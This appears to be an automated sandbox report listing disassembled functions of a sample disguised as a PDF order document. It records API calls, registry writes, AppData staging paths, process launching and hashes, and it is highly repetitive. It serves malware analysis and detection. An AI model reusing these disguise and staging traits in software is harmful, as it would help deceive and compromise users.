Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%s.dll$UXTHEME$\
API String ID: 2200240437-4240819195
Opcode ID: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
Instruction ID: e4af93c3cdb1388bd8c61da79080aae0fca49bc102c632b45afecef183fab820
Opcode Fuzzy Hash: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
Instruction Fuzzy Hash: D3F0F63055020AABEF159B64DD0DFEB375CEB08344F1400BAA986E10C1EA78D9258BAD

Function 00405C9C Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405CB0
GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000007,00000009,0000000B), ref: 00405CCA

Strings

"C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe", xrefs: 00405C9C
nsa, xrefs: 00405CA7
C:\Users\user\AppData\Local\Temp\, xrefs: 00405C9F

Memory Dump Source

Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe"$C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-107630211
Opcode ID: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
Instruction ID: 300c2e40aa17b99eb6a72bfbf7bdfcd49c284ecfca22a4765a13b30c42836751
Opcode Fuzzy Hash: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
Instruction Fuzzy Hash: B7F08236308308ABEB108F56ED04B9B7B98EF91750F14803BF944DA280D6B599549B68

Function 00402476 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenA.KERNEL32(hattepuldes\Stethospasm84\,00000023,?,00000000,00000002,00000011,00000002), ref: 004024C1
RegSetValueExA.KERNELBASE(?,?,?,?,hattepuldes\Stethospasm84\,00000000,?,00000000,00000002,00000011,00000002), ref: 00402501
RegCloseKey.ADVAPI32(?,?,?,hattepuldes\Stethospasm84\,00000000,?,00000000,00000002,00000011,00000002), ref: 004025E5

Strings

hattepuldes\Stethospasm84\, xrefs: 004024B2, 004024D4, 004024EB, 004024F6

Memory Dump Source

Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd

Similarity

API ID: CloseValuelstrlen
String ID: hattepuldes\Stethospasm84\
API String ID: 2655323295-3628054739
Opcode ID: 9a6c6d883b07e3aa4fb4fac5b967dc2d5c57ac0b71ef490e589c7d9f7fbbccc2
Instruction ID: 621c84a53dcaf2a3225fca01673abe6cb58a25da7017df2cdf0d3381b538cbef
Opcode Fuzzy Hash: 9a6c6d883b07e3aa4fb4fac5b967dc2d5c57ac0b71ef490e589c7d9f7fbbccc2
Instruction Fuzzy Hash: A1118171E00214BFEF10AFA5DE49EAE7A74EB44314F20843AF505F71D1D6B99D419B28

Function 004015BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00405B05: CharNextA.USER32(?,?,007A0970,?,00405B71,007A0970,007A0970,74DF3410,?,C:\Users\user\AppData\Local\Temp\,004058BC,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B13
Part of subcall function 00405B05: CharNextA.USER32(00000000), ref: 00405B18
Part of subcall function 00405B05: CharNextA.USER32(00000000), ref: 00405B2C

GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D

Part of subcall function 004056C1: CreateDirectoryA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405704

SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\skittaget\lektier\Genetableringernes111,00000000,00000000,000000F0), ref: 0040163C

Strings

C:\Users\user\AppData\Roaming\skittaget\lektier\Genetableringernes111, xrefs: 00401631

Memory Dump Source

Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\AppData\Roaming\skittaget\lektier\Genetableringernes111
API String ID: 1892508949-619757925
Opcode ID: 0633b04426b33a91403708f63f53e35a8aea6b13c15c91267645d809cf00bc01
Instruction ID: 50be7771e3672f66fe07c9109d7a0934d5fb35c2f40f106ce03ebb8fd80801ba
Opcode Fuzzy Hash: 0633b04426b33a91403708f63f53e35a8aea6b13c15c91267645d809cf00bc01
Instruction Fuzzy Hash: F2110831104151EBCB307FA54D409BF37B09A92324B28463FE592B22E3DA3D4942AA2E

Function 00405FBB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,00000400,: Completed,?,?,?,?,00000002,: Completed,?,00406270,80000002), ref: 00406001
RegCloseKey.KERNELBASE(?,?,00406270,80000002,Software\Microsoft\Windows\CurrentVersion,: Completed,: Completed,: Completed,?,subterritories), ref: 0040600C

Strings

: Completed, xrefs: 00405FBE, 00405FF2

Memory Dump Source

Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd

Similarity

API ID: CloseQueryValue
String ID: : Completed
API String ID: 3356406503-2954849223
Opcode ID: 02b0ca06b85e7c04b5820a528fa41c7769f17ba5f8155b904997ba725fa221fb
Instruction ID: d626b699d45c1b84179135bbe24e0f50758a75bbb6c39e90c48a844674782db3
Opcode Fuzzy Hash: 02b0ca06b85e7c04b5820a528fa41c7769f17ba5f8155b904997ba725fa221fb
Instruction Fuzzy Hash: BB017C7254020AABDF22CF61CC09FDB3FA8EF55364F01803AF959A2190D678D964DBA4

Function 00405773 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A0D70,Error launching installer), ref: 0040579C
CloseHandle.KERNEL32(?), ref: 004057A9

Strings

Error launching installer, xrefs: 00405786

Memory Dump Source

Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: cdb3d12e93955e9b982c1d5c04e4c9d7882df22fc18f803694ab679cdbae7595
Instruction ID: 33f777635f039691b801aef677aa15ec1976f60057d2e453273d56c3b7e761be
Opcode Fuzzy Hash: cdb3d12e93955e9b982c1d5c04e4c9d7882df22fc18f803694ab679cdbae7595
Instruction Fuzzy Hash: 58E04FF5600209BFEB009BA0DD09F7B7BACEB04304F008520BD40F2190D774A8148E78

Function 00402588 Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON

Download Yara Rule

APIs

RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025BA
RegEnumValueA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00020019), ref: 004025CD
RegCloseKey.ADVAPI32(?,?,?,hattepuldes\Stethospasm84\,00000000,?,00000000,00000002,00000011,00000002), ref: 004025E5

Memory Dump Source

Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd

Similarity

API ID: Enum$CloseValue
String ID:
API String ID: 397863658-0
Opcode ID: 5b71ec222b19f08e17faa31cd346880740b6c824b10cdee8db70d0fa459cde75
Instruction ID: 773a7303ee78c1acb854ba03901dd4e05cd3950a579afad538e8a0ffc4c9b84d
Opcode Fuzzy Hash: 5b71ec222b19f08e17faa31cd346880740b6c824b10cdee8db70d0fa459cde75
Instruction Fuzzy Hash: 5A018F71604204FFE7219F54DE99ABF7ABCEF41358F20803EF505B61C0DAB84E459629

Function 00402516 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 00402546
RegCloseKey.ADVAPI32(?,?,?,hattepuldes\Stethospasm84\,00000000,?,00000000,00000002,00000011,00000002), ref: 004025E5

Memory Dump Source

Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd

Similarity

API ID: CloseQueryValue
String ID:
API String ID: 3356406503-0
Opcode ID: bd6cd76112630bcbd7e0f5c7a8ef03fc241a29f4c9c3f225f081d49a75508afb
Instruction ID: a38d896beb00bd6b96c1afca0a4d37843b6a01bbd6b744c8c042ddc4311e4418
Opcode Fuzzy Hash: bd6cd76112630bcbd7e0f5c7a8ef03fc241a29f4c9c3f225f081d49a75508afb
Instruction Fuzzy Hash: E911BF71901205EFDF24CF64CA985AE7AB4EF01355F20843FE446B72C0D6B88A85DB19

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageA.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: e0cd62ee3040700a295e5b46d32f75e08d2db3f93dbac9e55f4e6f2709676977
Instruction ID: 845b7e25721e970e15b242f5633496821e9acd9660688f654d55c439198c0cfc
Opcode Fuzzy Hash: e0cd62ee3040700a295e5b46d32f75e08d2db3f93dbac9e55f4e6f2709676977
Instruction Fuzzy Hash: 0701F4316242209FE7195B389D04B2A3698E751314F10813FF951F65F2D678CC129B4C

Function 00401EC5 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 00401EE3
EnableWindow.USER32(00000000,00000000), ref: 00401EEE

Memory Dump Source

Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: 0ff81ee1c010caf08d5018515d9ac3da577e4609dff467edd0ef4c3ea6212f24
Instruction ID: 0d648207ff9f6deaa2b416c319ca4d02dfd5ede2de2ab3ccb6edf8448476ab2e
Opcode Fuzzy Hash: 0ff81ee1c010caf08d5018515d9ac3da577e4609dff467edd0ef4c3ea6212f24
Instruction Fuzzy Hash: 3AE09232A04200EFD714EFA5EA8856F7BB0EB40325B20403FF001F10C1CA7848418A59

Function 0040156F Relevance: 3.0, APIs: 2, Instructions: 23COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00010494), ref: 00401581
ShowWindow.USER32(0001048E), ref: 00401596

Memory Dump Source

Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 651c37bc6638362237d797d4381c0091f2d3ab27754a1e837ea31ce37a84f4b0
Instruction ID: 3a11bc7633d557fca9bfeaeb01eb6d797b1cc6e91976234f83cec9dd727a21ac
Opcode Fuzzy Hash: 651c37bc6638362237d797d4381c0091f2d3ab27754a1e837ea31ce37a84f4b0
Instruction Fuzzy Hash: 66E086727101109FC718DF58ED9087F73A5EBC5310310853FE603B3291C6789D018E28

Function 004064DD Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,?,00403398,0000000B), ref: 004064EF
GetProcAddress.KERNEL32(00000000,?), ref: 0040650A

Part of subcall function 0040646F: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406486
Part of subcall function 0040646F: wsprintfA.USER32 ref: 004064BF
Part of subcall function 0040646F: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064D3

Memory Dump Source

Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 86a36fe79f27c55ffb4f68e9eb19a7d4fc21bb30cdd0e1b9c8c3d4c34093b0ac
Instruction ID: 042920e8a29c9b7d047f9b8d679db2b98f9cdac4fa712678353772f8bdeb7375
Opcode Fuzzy Hash: 86a36fe79f27c55ffb4f68e9eb19a7d4fc21bb30cdd0e1b9c8c3d4c34093b0ac
Instruction Fuzzy Hash: 6EE0863260421167D6105B70BE0493B72A89E84700302043EF546F6144DB38DC769A6D

Function 00405C6D Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe,80000000,00000003), ref: 00405C71
CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405C93

Memory Dump Source

Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
